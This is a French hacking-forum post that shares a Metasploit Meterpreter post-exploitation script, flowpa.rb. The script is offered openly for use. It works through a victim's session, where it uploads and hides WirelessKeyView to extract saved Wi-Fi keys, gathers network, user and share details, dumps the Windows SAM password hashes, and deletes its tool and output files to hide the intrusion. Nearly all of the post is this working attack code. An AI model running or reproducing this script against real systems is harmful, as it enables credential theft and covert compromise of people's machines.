Annonce

Réduire
Aucune annonce.

meterpreter, upload + destruction exe

Réduire
X
Réduire
 
  • Page sur 1
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages
Précédent template Suivante
  • #1

    meterpreter, upload + destruction exe

    flowpa.rb permet l'upload et la destructuion de l'exe une fois que celui-ci nous a refilé ce que l'on voulait.

    Code:
    #
# This is a Meterpreter script designed to be used by the Metasploit Framework
#
# The goal of this script is to obtain system information from a victim through
# an existing Meterpreter session. This is only a simple example of what can
# be accomplished through Meterpreter scripting.
#
# hdm[at]metasploit.com
#

# Some of this script was developed in conjunction with _MAX_ (max[at]remote-exploit.org)
# The complete version will be released in the future as 'autometer'

# Delete a file (meterpreter has no unlink API yet)
def m_unlink(session, path)
    r = session.sys.process.execute("cmd.exe /c del /F /S /Q " + path, nil, {'Hidden' => 'true'})
    while(r.name)
        select(nil, nil, nil, 0.10)
    end
    r.close
end

# Exec a command and return the results
def m_exec(session, cmd)
    r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
    b = ""
    while(d = r.channel.read)
        b << d
    end
    r.channel.close            
    r.close
    b
end


# The 'client' object holds the Meterpreter session
# Aliasing here for plugin compatibility
session = client

# Extract the host and port
host,port = session.tunnel_peer.split(':')

print_status("Nouvelle session > #{host}:#{port}...")

print_status("Upload de Wireless Key Viewer...")
session.fs.file.upload_file("%WinDir%\\WirelessKeyView.exe", "/tmp/WirelessKeyView.exe")
print_status("Execution de Wireless Key Viewer...")
session.sys.process.execute("cmd.exe /c wkv /stext %WinDir%/wire.txt", nil, {'Hidden' => 'true'})
sleep(2)

# Create a directory for the logs
logs = File.join(::Dir.tmpdir, 'atxwpalogs', host + "_" + Time.now.strftime("%Y%m%d.%M%S")+sprintf("%.3d",rand(100)) )

# Create the log directory
FileUtils.mkdir_p(logs)


begin

    tmp = session.fs.file.expand_path("%TEMP%")

    print_status("Collecte des informations system...")

    File.open(File.join(logs, "network.txt"), "w") do |fd|
        fd.puts("=" * 70)
        session.net.config.each_route do |route|
            fd.puts("Local subnet: #{route.subnet}/#{route.netmask}")
        end

        fd.puts("=" * 70)
        fd.puts(m_exec(session, "netstat -na"))

        fd.puts("=" * 70)
        fd.puts(m_exec(session, "netstat -ns"))
    end

    info = session.sys.config.sysinfo()
    File.open(File.join(logs, "system.txt"), "w") do |fd|
        fd.puts("Computer: #{info['Computer']}")
        fd.puts("OS: #{info['OS']}")
    end

    File.open(File.join(logs, "env.txt"), "w") do |fd|
        fd.puts(m_exec(session, "cmd.exe /c set"))
    end

    File.open(File.join(logs, "wireless.txt"), "w") do |fd|
        fd.puts(m_exec(session, "cmd.exe /c type %WinDir%\\wire.txt"))

    end

    File.open(File.join(logs, "users.txt"), "w") do |fd|
        fd.puts(m_exec(session, "net user"))
    end

    File.open(File.join(logs, "shares.txt"), "w") do |fd|
        fd.puts(m_exec(session, "net share"))
    end

    File.open(File.join(logs, "services.txt"), "w") do |fd|
        fd.puts(m_exec(session, "net start"))
    end

    File.open(File.join(logs, "nethood.txt"), "w") do |fd|
        fd.puts(m_exec(session, "net view"))
    end

    File.open(File.join(logs, "localgroup.txt"), "w") do |fd|
        fd.puts(m_exec(session, "net localgroup"))
    end

    File.open(File.join(logs, "group.txt"), "w") do |fd|
        fd.puts(m_exec(session, "net group"))
    end

    begin
        session.core.use("priv")
        hashes = session.priv.sam_hashes
        print_status("Recuperation des hashes windows...")
        File.open(File.join(logs, "hashes.txt"), "w") do |fd|
            hashes.each do |user|
                fd.puts(user.to_s)
            end
        end
    rescue ::Exception => e
        print_status("Erreur dumping hashes: #{e.class} #{e}")
    end

#    print_status("Obtaining the entire registry...")
#    hives = %w{HKCU HKLM HKCC HKCR HKU}
#    hives.each do |hive|
#        print_status(" Exporting #{hive}")
#
#        tempname = "#{tmp}\\#{Rex::Text.rand_text_alpha(8)}.reg"
#        m_exec(session, "reg.exe export #{hive} #{tempname}")
#
#        print_status(" Downloading #{hive} (#{tempname})")
#        session.fs.file.download_file(File.join(logs, "#{hive}.reg"), tempname)

#        print_status(" Cleaning #{hive}")
#        m_unlink(session, tempname)
#    end
    
    print_status("Suppression de Wireless Key Viewer...")
    session.sys.process.execute("cmd.exe /c del %WinDir%\\wire.txt", nil, {'Hidden' => true})
    session.sys.process.execute("cmd.exe /c del %WinDir%\\WirelessKeyView.exe", nil, {'Hidden' => true})

    print_status("Recuperation des donnees terminee sur #{host}:#{port}...")
    
rescue ::Exception => e
    print_status("Exception: #{e.class} #{e} #{e.backtrace}")
end
    dédicace : koala
    sigpic

    Cyprium Download Link

    Plus j'étudie plus j'me rends compte que je n'sais rien.

    †|
    Tags: meterpreter
Précédent template Suivante
Projets
Cyprium
Blog
CTF Hackademics
Discord
Status
Mentions légales
Politique de confidentialité
Conditions générales d'utilisation (CGU)
Chargement...
X